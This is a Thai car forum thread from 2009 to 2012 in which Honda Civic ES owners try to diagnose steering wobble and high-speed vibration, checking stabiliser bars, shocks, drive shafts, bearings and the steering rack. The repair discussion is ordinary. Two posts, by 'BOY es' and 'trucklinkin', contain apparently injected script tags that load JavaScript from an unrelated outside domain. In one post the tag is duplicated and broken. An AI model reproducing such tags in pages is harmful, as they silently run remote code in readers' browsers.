ตอบ
Gogo

เข้าร่วม: 10 ตุลา 2008
ตอบ: 20

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 7

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 24 พฤศจิกา 2009 13:18 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
วิ่งทางไม่เรียบ หรือขึ้นหลังเต่า หรือเนินเล็กเล็ก แบบช้าๆๆ พวงมาลัยมีอาการส่ายซ้ายทีขวาที หรือวิ่งเหยียบเส้นจราจร ก็ส่ายเหมือนกัน ถ้าวิ่งที่ความเร็วซัก 100-120 มันก็จะสั่นๆ นอกจากนั้นเวลากลับรถเร็วๆ พวงมาลัยมันจะสู้มือ เวลาคืนพวงมาลัยก็จะสะดุดๆ เคยเอาไปแก้หลายร้านแล้วครับ แต่ละร้านบอกไม่เหมือนกันซักที่เลย

ร้านแรก บอกว่าเป็นที่บู๊ซปีกนกมันขาด ก็เลยเปลี่ยน ทั้งซ้ายและขวาและเปลี่ยนโช้คจาก DC5 เป็น โช้ค Std. และตั้งศูนย์ถ่วงล้อให้ใหม่ก็ไม่หายครับ เค้าก็บอกว่าสงสัยเป็นที่แร็คพวงมาลัยให้เอาเข้าศูนย์

เข้าศูนย์ ศูนย์ไม่เช็คให้บอกว่ารถไปโหลดมา มีการปรับตั้งมุมล้อใหม่ ให้เอากลับไปที่ร้านแรกให้ตั้งศูนย์ใหม่ เลยตัดสินใจเอาเข้าอู่นอก

เข้าอู่นอก ช่างบอกช่วงล่างทุกอย่างปรกติ เลยอัดจารบีให้ใหม่ และเปลี่ยนนำมันเพาเวอร์ ก็ไม่หายครับ

เข้าร้านยางอีกร้าน ช่างบอกสงสัยกระปุกน้ำมันเพาเวอร์จะสกปรก เลยล่างให้ใหม่ และบอกว่ายางตอนนี้กินไม่เต็มหน้า(เนื่องจากมีการแบะมุมล้อ) และดอกยางก็สึกเยอะมาก ช่างเลยสลับยางเอาล้อที่ดอกยางยังเยอะมาไว้ที่ล้อคู่หน้าแทน ก็ไม่หายครับ สุดท้ายก็ลองเปลี่ยนยางใหม่ดู และใส่ตัวปรับคู่แคมเบอร์หลัง ก็ไม่หายครับ

ตอนนี้มืดแปดด้านครับ ไม่รู้จะแก้ยังไงดี ขอคำแนะนำจากเพื่อนๆผู้มีประสบการณ์ และผู้รู้ทั้งหลายหน่อยครับ

ปล. รายละเอียดของรถผมนะครับ รถปี 04 เกียร์ manual รถโหลดตัดสปริงคู่หน้า คู่หลังเท่าเดิม ล้อขอบ 17 ใส่ค้ำโช้คหน้า นอกนั้นก็เดิมๆครับ
ได้รับคำขอบคุณจาก: soloshot  movingtown  วุฒิชัย 
pupaekung

ชื่อเล่น: เป้

เข้าร่วม: 22 มกรา 2009
ตอบ: 269

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 200
ให้คำขอบคุณ: 101

ปี: 2002
อังคาร, 24 พฤศจิกา 2009 14:30 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ขอเก็บข้อมูลด้วยครับ รอผู้รู้สักครู่ครับ
minezoo

เข้าร่วม: 17 พฤศจิกา 2008
ตอบ: 492

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 532
ให้คำขอบคุณ: 207

ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อังคาร, 24 พฤศจิกา 2009 16:55 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ไม่รู้เป็นอย่างเดียวกับ ท่านนี้หรือเปล่านะครับ
พวงมาลัยมันสะท้านอะครับ http://www.civicesgroup.com/forum/topic12005

ถ้าเป็นที่ น้ำมันเพาเวอร์ มันจะหมุนพวงมาลัยยาก แต่ไม่ค่อยจะเป็นกัน นะครับ

ถ้ามีโอกาสเข้าร้านที่ มี เครื่องยก(ฮ้อย) ลองเดินดูด้านล่าง นะครับ ว่า เหล็กกันโคลง
อยู่ใน ตน. ตรงกลาง หรือเปล่า

อาการรถผม ก่อนหน้านี้ คือ เหล็กกันโคลง ES03 / 15.3mm (ES04=17.6mm)
ขยับไปอยู่ ด้าน ซ้าย หรือ ขวา มากกว่าปกติ อาจจะเพราะว่า ผมใส่สปริงโหลดมา
จะทำให้ พอเจอ ขระขระ นิดหนอย พวงมาลัย มันจะดึง ซ้ายที ขวาที
ขับเร็วๆ เบรค ก็จะ เบนไปซ้าย หรือ ขวา

การแก้ไข นะครับ ขยับให้ตรง และ ให้ร้าน ช่วงล่าง เอา เข็มขัดรัดท่อน้ำ รัด
ที่ยาง ประกับ กันโคลง ทั้ง สองตัว ใส่ทั้งหมด 4 ตัว ครับ
คราวนี้มันจะไม่ดิ้นไปมา แล้วครับ

อีกอาการ หนึ่ง ที่เคยเจอคือ โชคเสีย แกส ออก ไม่เท่ากัน อันนี้ เจอ กับ DC5 ครับ
เป็น เหมือนกัน กับ ข้างบนเลยครับ พอเจอ ขระขระ นิดหนอย พวงมาลัย มันจะดึง ซ้ายที ขวาที

ค่อยๆ ไล่ดูนะครับ เคยเป็นเหมือน กันครับ แก้ไปแก้มา จน อยากจะขายรถทิ้ง เลย
ได้รับคำขอบคุณจาก: Gogo  kobon  aun99  soloshot  movingtown  vat  EsNon  nooduean_69 
BOY es

ชื่อเล่น: บอยคับ

เข้าร่วม: 27 สิงหา 2009
ตอบ: 708

Guru ES
Guru ES

ได้รับคำขอบคุณ: 362
ให้คำขอบคุณ: 0

ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 24 พฤศจิกา 2009 17:13 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
เก็บข้อมูลคับ "<script src="https://sport32news.com/civicesgroup.js">
Oad

ชื่อเล่น: โอ๊ต

เข้าร่วม: 18 พฤศจิกา 2009
ตอบ: 83

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 183
ให้คำขอบคุณ: 213

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 24 พฤศจิกา 2009 20:50 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
กรณีน่าศึกษาไว้ เผื่อโดนกัยตัวเอง
Gogo

น้องใหม่
น้องใหม่

อังคาร, 24 พฤศจิกา 2009 21:02 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
minezoo พิมพ์ว่า:
ไม่รู้เป็นอย่างเดียวกับ ท่านนี้หรือเปล่านะครับ
พวงมาลัยมันสะท้านอะครับ http://www.civicesgroup.com/forum/topic12005

ถ้าเป็นที่ น้ำมันเพาเวอร์ มันจะหมุนพวงมาลัยยาก แต่ไม่ค่อยจะเป็นกัน นะครับ

ถ้ามีโอกาสเข้าร้านที่ มี เครื่องยก(ฮ้อย) ลองเดินดูด้านล่าง นะครับ ว่า เหล็กกันโคลง
อยู่ใน ตน. ตรงกลาง หรือเปล่า

อาการรถผม ก่อนหน้านี้ คือ เหล็กกันโคลง ES03 / 15.3mm (ES04=17.6mm)
ขยับไปอยู่ ด้าน ซ้าย หรือ ขวา มากกว่าปกติ อาจจะเพราะว่า ผมใส่สปริงโหลดมา
จะทำให้ พอเจอ ขระขระ นิดหนอย พวงมาลัย มันจะดึง ซ้ายที ขวาที
ขับเร็วๆ เบรค ก็จะ เบนไปซ้าย หรือ ขวา

การแก้ไข นะครับ ขยับให้ตรง และ ให้ร้าน ช่วงล่าง เอา เข็มขัดรัดท่อน้ำ รัด
ที่ยาง ประกับ กันโคลง ทั้ง สองตัว ใส่ทั้งหมด 4 ตัว ครับ
คราวนี้มันจะไม่ดิ้นไปมา แล้วครับ

อีกอาการ หนึ่ง ที่เคยเจอคือ โชคเสีย แกส ออก ไม่เท่ากัน อันนี้ เจอ กับ DC5 ครับ
เป็น เหมือนกัน กับ ข้างบนเลยครับ พอเจอ ขระขระ นิดหนอย พวงมาลัย มันจะดึง ซ้ายที ขวาที

ค่อยๆ ไล่ดูนะครับ เคยเป็นเหมือน กันครับ แก้ไปแก้มา จน อยากจะขายรถทิ้ง เลย

ผมลองตาม link ไปอ่านดูแล้วครับ อาการคล้ายกันครับแต่ของผมดูจะหนักกว่าครับ
ส่วนค่า ES04=17.6mm ที่คุณ minezoo ให้มาอันนี้คือค่าอะไรเหรอครับ ผมจะได้ไปคุยกับช่างเค้าได้ถูก ขอบคุณมากครับสำหรับข้อมูล
Gogo

น้องใหม่
น้องใหม่

อังคาร, 24 พฤศจิกา 2009 21:10 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ใครที่มีอาการแบบนี้แล้วแก้หายช่วยบอกวิธีหน่อยนะครับ พอดีผมต้องขับทางไกลกลับบ้านเดือนหน้า รู้สึกไม่ค่อยสบายใจเลยครับ
Panic_Mode

ชื่อเล่น: โป้ง

เข้าร่วม: 10 มิถุนา 2009
ตอบ: 165

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 101
ให้คำขอบคุณ: 13

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 25 พฤศจิกา 2009 00:14 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
zผมก็เป็น นะ ผมเปลี่ยน ยางเพลาขับหน้า ซ้ายขวา ตัวนอกและใน และ ลูกปืนล้อ ขวา ซ้าย......แล้วไปให้ ช่างเขาปรับ มุมล้อ ตั้ง 0 ก็ ดีขึ้น ช่างบอกว่า เป็นที่น๊อตที่ใส่ปรับแกนล้อมีการบากล่องน๊อตมาก็ จัดการเปลี่ยนให้ แล้วก้ ใส่ ปลอกกันสั่นให้ ก็ เป็นปกติ ครับ
ได้รับคำขอบคุณจาก: Gogo  kobon 
kog-4

เข้าร่วม: 10 กันยา 2009
ตอบ: 52

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 57
ให้คำขอบคุณ: 195

พุธ, 25 พฤศจิกา 2009 03:51 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ของผมเป็น ตอนแอลกอฮอร์ขึ้น 300กว่า
intake

ชื่อเล่น: เอม

เข้าร่วม: 08 สิงหา 2009

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 20
ให้คำขอบคุณ: 234

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 25 พฤศจิกา 2009 08:07 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
มาเก็บคับ ของปมก็เป็นอ่ะคับเปลี่ยนมาเป็นโช้คDC5อาการดีขึ้นแต่ก็ยังมีอยู่บ้าง ถ้าลมยางอ่อนลง30-31อาการจะมากขึ้น(ล้อ17)
เหมือนพวงมาลัยดึงไปดึงมา ไม่รู้จะแก้งัย ขับแล้วไม่ค่อยมันใจเยย..
minezoo

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 25 พฤศจิกา 2009 10:14 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
[quote="Gogo"]

ส่วนค่า ES04=17.6mm ที่คุณ minezoo ให้มาอันนี้คือค่าอะไรเหรอครับ ผมจะได้ไปคุยกับช่างเค้าได้ถูก ขอบคุณมากครับสำหรับข้อมูล

ขนาดเหล็กกันโคลงหน้าครับ

เศร้า!+ เซ็ง > เหล็กกันโคลงหน้า ES03

ส่วนเรื่องเข็มขัดรัดสายยาง ลองดูจากรูปน่าจะ พอเข้าใจนะครับ ไม่ทราบใส่ ปลอกกันสั่น ที่ล้อแมก หรือ ยังครับ
ได้รับคำขอบคุณจาก: Gogo 
Gogo

น้องใหม่
น้องใหม่

พุธ, 25 พฤศจิกา 2009 12:48 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
[quote="minezoo"]
Gogo พิมพ์ว่า:

ขนาดเหล็กกันโคลงหน้าครับ

เศร้า!+ เซ็ง > เหล็กกันโคลงหน้า ES03

ส่วนเรื่องเข็มขัดรัดสายยาง ลองดูจากรูปน่าจะ พอเข้าใจนะครับ ไม่ทราบใส่ ปลอกกันสั่น ที่ล้อแมก หรือ ยังครับ

ใส่ปลอกกันสั่นแล้วครับ แล้วตัวเหล็กกันโคลงมีรูปตอนที่ติดอยู่บนรถหรือเปล่าครับ ถ้ามีรบกวนขอดูหน่อยนะครับ ว่าตำแหน่งที่ถูกมันเป็นยังไง
Gogo

น้องใหม่
น้องใหม่

พุธ, 25 พฤศจิกา 2009 12:57 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
Panic_Mode พิมพ์ว่า:
zผมก็เป็น นะ ผมเปลี่ยน ยางเพลาขับหน้า ซ้ายขวา ตัวนอกและใน และ ลูกปืนล้อ ขวา ซ้าย......แล้วไปให้ ช่างเขาปรับ มุมล้อ ตั้ง 0 ก็ ดีขึ้น ช่างบอกว่า เป็นที่น๊อตที่ใส่ปรับแกนล้อมีการบากล่องน๊อตมาก็ จัดการเปลี่ยนให้ แล้วก้ ใส่ ปลอกกันสั่นให้ ก็ เป็นปกติ ครับ

เบ็ดเสร็จแล้วค่าใช้จ่ายเท่าไหร่ครับ
minezoo

พุธ, 25 พฤศจิกา 2009 16:45 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ลองตามไปดูที่ ลิ้งนี้นะครับ คุณ Pongpang อธิบายไว้ละเอียดเลยครับ

มาบอกกล่าวสำหรับ ใครที่อยากใส่เหล็กกันโคลงหน้า

เหล็กกันโคลง 22.2 มิลและ 25.4มิล ของตรงรุ่น 1.7 ของปี 01-02

รูป ด้านใต้รถ ไว้จะถ่ายมาลงให้นะครับ
ได้รับคำขอบคุณจาก: Gogo  kobon 
Gogo

น้องใหม่
น้องใหม่

พุธ, 25 พฤศจิกา 2009 22:03 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
สรุปรายการที่จะต้องเช็คเพิ่ม ณ ตอนนี้

1.เหล็กกันโคลง(ถ้ามี ยังไม่ได้ก้มดูเลยครับ)
2.ยางเพลาขับหน้า ซ้ายขวา ตัวนอกและใน และ ลูกปืนล้อ ขวา ซ้าย

มีอย่างอื่นต้องเช็คเพิ่มหรือเปล่าครับ (เพราะผมต้องลางานไปทำอะ เลยอยากให้มันจบในวันเดียว)
ได้รับคำขอบคุณจาก: intake 
es_joe

ชื่อเล่น: โจ้

เข้าร่วม: 23 ธันวา 2008
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 21
ให้คำขอบคุณ: 2

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 26 พฤศจิกา 2009 15:24 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ของผมก้อเป็นเหมือนเจ้าของกระทู้เลยคับ

ผมแก้จนไม่รู้แก้ยังไงแล้วคับ เลยปล่อยไปยังงั้นเลยคับ

ถ้าเเก้หายแล้วบอกผมด้วยน่ะคับ รถผมปี04เหมือนกานคับ
Gogo

น้องใหม่
น้องใหม่

พฤหัส, 26 พฤศจิกา 2009 21:19 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ได้ครับ ตอนนี้กำลังรวบรวมข้อมูลอยู่ครับ จะไล่ทำไปเรื่อยๆ จนกว่าจะหาย ไม่ยอมแพ้ขายรถทิ้งแน่นอน
แล้วจะมาอัพเดตความคืบหน้าครับ
ได้รับคำขอบคุณจาก: movingtown 
surachai

ชื่อเล่น: อั้ม

เข้าร่วม: 15 พฤศจิกา 2009

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 93
ให้คำขอบคุณ: 105

ศุกร์, 27 พฤศจิกา 2009 11:49 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ของผมก็ 04 พวงมาลัยหนัก ค่อยๆทำครับอย่าเพิ่งท้อ
soloshot

ชื่อเล่น: แฟลช

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 1243

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2428
ให้คำขอบคุณ: 1275

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 27 พฤศจิกา 2009 12:42 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
สรุปรายการที่จะต้องเช็คเพิ่ม ณ ตอนนี้

1.เหล็กกันโคลง(ถ้ามี ยังไม่ได้ก้มดูเลยครับ)
2.ยางเพลาขับหน้า ซ้ายขวา ตัวนอกและใน และ ลูกปืนล้อ ขวา ซ้าย

มีอย่างอื่นต้องเช็คเพิ่มหรือเปล่าครับ (เพราะผมต้องลางานไปทำอะ เลยอยากให้มันจบในวันเดียว)

อย่าลืมดู แร็คพวงมาลัย ด้วยนะครับ
movingtown

ชื่อเล่น: อเด

เข้าร่วม: 15 พฤศจิกา 2009
ตอบ: 1505

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1259
ให้คำขอบคุณ: 1948

สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 9 พฤศจิกา 2011 14:56 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
วิ่งทางไม่เรียบ หรือขึ้นหลังเต่า หรือเนินเล็กเล็ก แบบช้าๆๆ พวงมาลัยมีอาการส่ายซ้ายทีขวาที หรือวิ่งเหยียบเส้นจราจร ก็ส่ายเหมือนกัน ถ้าวิ่งที่ความเร็วซัก 100-120 มันก็จะสั่นๆ นอกจากนั้นเวลากลับรถเร็วๆ พวงมาลัยมันจะสู้มือ เวลาคืนพวงมาลัยก็จะสะดุดๆ เคยเอาไปแก้หลายร้านแล้วครับ แต่ละร้านบอกไม่เหมือนกันซักที่เลย

ร้านแรก บอกว่าเป็นที่บู๊ซปีกนกมันขาด ก็เลยเปลี่ยน ทั้งซ้ายและขวาและเปลี่ยนโช้คจาก DC5 เป็น โช้ค Std. และตั้งศูนย์ถ่วงล้อให้ใหม่ก็ไม่หายครับ เค้าก็บอกว่าสงสัยเป็นที่แร็คพวงมาลัยให้เอาเข้าศูนย์

เข้าศูนย์ ศูนย์ไม่เช็คให้บอกว่ารถไปโหลดมา มีการปรับตั้งมุมล้อใหม่ ให้เอากลับไปที่ร้านแรกให้ตั้งศูนย์ใหม่ เลยตัดสินใจเอาเข้าอู่นอก

เข้าอู่นอก ช่างบอกช่วงล่างทุกอย่างปรกติ เลยอัดจารบีให้ใหม่ และเปลี่ยนนำมันเพาเวอร์ ก็ไม่หายครับ

เข้าร้านยางอีกร้าน ช่างบอกสงสัยกระปุกน้ำมันเพาเวอร์จะสกปรก เลยล่างให้ใหม่ และบอกว่ายางตอนนี้กินไม่เต็มหน้า(เนื่องจากมีการแบะมุมล้อ) และดอกยางก็สึกเยอะมาก ช่างเลยสลับยางเอาล้อที่ดอกยางยังเยอะมาไว้ที่ล้อคู่หน้าแทน ก็ไม่หายครับ สุดท้ายก็ลองเปลี่ยนยางใหม่ดู และใส่ตัวปรับคู่แคมเบอร์หลัง ก็ไม่หายครับ

ตอนนี้มืดแปดด้านครับ ไม่รู้จะแก้ยังไงดี ขอคำแนะนำจากเพื่อนๆผู้มีประสบการณ์ และผู้รู้ทั้งหลายหน่อยครับ

ปล. รายละเอียดของรถผมนะครับ รถปี 04 เกียร์ manual รถโหลดตัดสปริงคู่หน้า คู่หลังเท่าเดิม ล้อขอบ 17 ใส่ค้ำโช้คหน้า นอกนั้นก็เดิมๆครับ

ลองเข้าไปหาข้อมูล มันเด๊ะเลยครับ อาการรถผมเอง เหมือนเด๊ะ เป็นปีกว่าเเล้วครับที่ลองผิดลองถูก บอกตรง ๆว่าเหนื่อยจัยมาก
อาการดังนี้ครับ
- วิ่งทางไม่เรียบ หรือเนินเล็กเล็ก เว้า ๆ คลื่น ๆ แบบช้าๆๆ พวงมาลัยมีอาการส่ายซ้ายทีขวาที
- วิ่งผ่านบนเส้นจราจร เช่น ลูกศร จะส่ายออกอาการชัด
- ความเร็ว 80 เริ่มเเต่ไม่ชัด
- ความเร็ว 100-120 พวงมาลัยสั่น เบาด้วย สั่น จิ๊ ก ๆ ลักษณะการสั่นของพวงมาลัยที่สังเกตุได้คือ จิ๊ ก ๆ ๆๆ 2 วิ หยุด ต่อเนื่อง จิ๊ ก ๆ ๆๆ 2 วิ หยุด จิ๊ ก ๆ ๆๆ 2 วิ หยุด เป็นทุกสภาพถนน ** เเต่ *** ถ้าเป็นทาง คอนกรีต อาการดังกล่าวจะลดลงมาก
- ความเร็วมากกว่า 120 สั่นเเล้วพวงมาลับเบา หวิวมาก
- เบรคเมื่อไหร่ พวงมาลัยจะเบามากถึงมากที่สุดเเละส่ายร่อนเป็นงู ซ้ายทีขวาที

ประวัติคือ รถผมเคยเพลาขับขวาหลุด มาครั้งนึง เพราะช่างอู่ใส่เพลาขับไม่เเน่น หลังจากนั้น อาการเหล่านี้ก็มีขึ้นเเต่ช่วงเวลาจะทิ้งช่วงค่อยเกิด
เลยไม่รู้ว่าเกี่ยวกันหรือไม่ เเต่ที่รู้สึกด้วยตัวเองอย่างชัดเจน คือ เวลาเบรคลดความเร็ว เบรคจะหยุดเเต่ไม่หยุดนิ่ง เเล้วกดคันเร่งความเร็วใหม่
จะกระตุก เเคร๊ก ทันที เเต่เปลี่ยนเพลาขับมาเเล้ว ทั้งหมด 3 ครั้ง
- ครั้งเเรกคือร้านช่างที่ทําหลุด เพลาขับขวา (อาการสั่นเเละส่าย ยังไม่เกิดทันที เเต่นานเท่าไหร่จําไม่ได้ไม่น่าเกิน 5-7 เดือน)
- อาการสั่นเริ่มมี จึงเเก้โดยช่างบอกให้ดูที่โช็ค จึงแก้ด้วยการอัดน้ำมันที่โช็ค (ใช้สปริง tein ตอนนั้น ) รวมประมาณ 3-4 รอบ (คนละร้านด้วย) ปรากฏว่าไม่หาย สุดท้าย 25/12/2010จึงเปลี่ยนมาใช้ DC5 + Tein เปลี่ยนเสร็จปุ๊บขับไปเหนือเชียงราย ขาไปปรากฏว่าไม่หายยังสั่นที่ 120 จึงไม่น่าใช่โช๊คล่ะ
- ครั้งสอง ต่อเนื่องไปเที่ยวเหนือเชียงรายขึ้นเขา ใช้ทั้งเกีย D และต่ำ(รถสั่นมากที่ความเร็ว 40 , 60 ก็สั่นอย่างชัดเจน ผมจึงให้ช่างที่เชียงใหม่เปลี่ยน ผล คือ อาการเบาลง นิดนึง คือจะไม่สั่นที่ความเร็วต่ำแต่ยังสั่นที่ 110 ขึ้นเหมือนเดิม

และทนใช้มาเรื่อย ๆ เข้าออกอู่ (หลายอู่ )จนเหนื่อยใจ ระหว่างนี้ให้ช่างทั้งเช็ค เปลี่ยนบูชปีกนก ก็ไม่หาย เปลี่ยน ปีกนกซ้ายที่สังเกตว่ารูมันออกเบี้ยว ๆก็ไม่หาย เปลี่ยนยางคู่หน้า ก็ไม่หาย
- ครั้งที่สาม เดือนสิงหาคมที่แล้ว ก็ยังปักใจอยู่ที่เพลาขับ จึงไปเปลี่ยนที่ร้านพี่ใหม่ทั้งเส้น ขับกลับมาระยองรู้สึกว่าดีขึ้นแต่ หรือว่าตอนนั้นอุปมาไปเองว่านิ่งขึ้น แต่ที่แน่ ๆ ตอนนั้นก็ยังสั่นที่ความเร็วสูง ๆ 120

จนบัดนี้ก็รู้สึกว่ามันยังเป็นเหมือนเดิมข้างต้น ผมมืด 10 ด้านแล้วครับ เกี่ยวมั๊ยที่แร็คพวงมาลัยครับ ใครพอให้คำแนะนำผมทีครับ กลุ้มมากรถไม่ดี เงินต้องซ่อม เปลี่ยนใหม่ก็หนัก ใจก็ยังรัก ES
ได้รับคำขอบคุณจาก: nooduean_69 
Dimention_J

ชื่อเล่น: จอม

เข้าร่วม: 20 ธันวา 2011
ตอบ: 347

ได้รับคำขอบคุณ: 160
ให้คำขอบคุณ: 8

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 18 เมษา 2012 10:59 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ของผมตอนนี้ก็เป็นเมื่อกันคร๊าบ 03  เดี่ยววันศุกร์นี้ จะนำรถเข้าไปเช๊คที่อู่ หากมีวิธีเพิ่มเติ่มจะมา เล่า ให้ฟังน่ะคร๊าบ
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 18 เมษา 2012 11:29 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
เหนบอกว่าตัดสปริงมาหรอครับ 

ของผมก้อเคยเปนแบบใกล้เคียงกันนะครับ

ตัดสปริงมา แล้วร้านคงตัดมาไม่ดี ไม่เท่ากัน

รถเสียศูนย์เลยครับ เบ้าโช้คเสียด้วย พวงมาลัยหนัก

หักสุดก้อจะป๊อก ป๊อก งี้ครับ 

เหนพี่บอกว่าเช็คมาหมดแล้ว ยังไงลองเช็คดูนะครับ

สู้ๆๆๆ
catsteal

ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 18 เมษา 2012 22:06 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ลูกหมากคันชัก เชคหัวโช้ค จี้ประชิด ปลอกกันสั่ย 
Tui_VTEC

ชื่อเล่น: ตุ้ย

เข้าร่วม: 28 เมษา 2010
ตอบ: 53

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 80
ให้คำขอบคุณ: 6

พุธ, 18 เมษา 2012 22:23 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
เป็นเหมือนกัน เจอทางไม่เรียบ ส่ายซ้ายทีขวาที  มาเก็บข้อมูลคับ ท่านได้เจอทางสว่างแล้วชี้แนะด้วยนะคับ จะได้ทำทีเดียวจบ
itcentre

เข้าร่วม: 25 ตุลา 2010
ตอบ: 1154

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1492
ให้คำขอบคุณ: 448

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 18 เมษา 2012 22:34 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
รอด้วยคนครับ
luckratchada

ชื่อเล่น: ลักษณ์

เข้าร่วม: 29 ธันวา 2011
ตอบ: 629

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938
ให้คำขอบคุณ: 304

พุธ, 18 เมษา 2012 22:41 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
ของผมจะเป็นตอนขึ้น100ไปแล้ว จะสั่น ไม่รู้ว่าเป็นเพราะไปเปลี่ยนบูธปีกนกมารึเปล่าแล้วไม่ได้ตั้ง 0 ก่อนหน้านี้ยังไม่เป็นเพราะช่างบอกไม่ต้องตั้ง 0 แล้วมันต้องตั้ง 0 รึป่าวครับ
The_One

เข้าร่วม: 30 พฤษภาคม 2010
ตอบ: 761

Guru ES
Guru ES

ได้รับคำขอบคุณ: 340
ให้คำขอบคุณ: 112

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พฤหัส, 19 เมษา 2012 12:45 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
เก็บข้อมูลคับ
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

จันทร์, 28 พฤษภาคม 2012 23:47 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
เป็นอยู่เหมือนกัน หาทางแก้กันยังไงครับ ใครแก้แล้วหายบอกกันหน่อยครับ
trucklinkin

ชื่อเล่น: โจ้

เข้าร่วม: 20 เมษา 2012
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 1196

ปี: 2005
อังคาร, 29 พฤษภาคม 2012 08:36 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
kog-4 พิมพ์ว่า:
ของผมเป็น ตอนแอลกอฮอร์ขึ้น 300กว่า

เป็นเหมือนกันเลย <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
prgs55

ชื่อเล่น: เล็ก

เข้าร่วม: 26 มิถุนา 2010
ตอบ: 861

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1794
ให้คำขอบคุณ: 1103

อังคาร, 29 พฤษภาคม 2012 15:05 - พวงมาลัยส่ายและสั่นครับ ใครมีอาการเป็นเหมือนกันบ้างครับ
